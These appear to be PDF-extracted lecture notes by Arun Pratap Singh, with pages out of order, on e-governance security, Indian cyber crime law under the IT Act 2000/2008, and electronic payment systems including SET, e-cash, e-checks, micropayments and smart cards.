Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
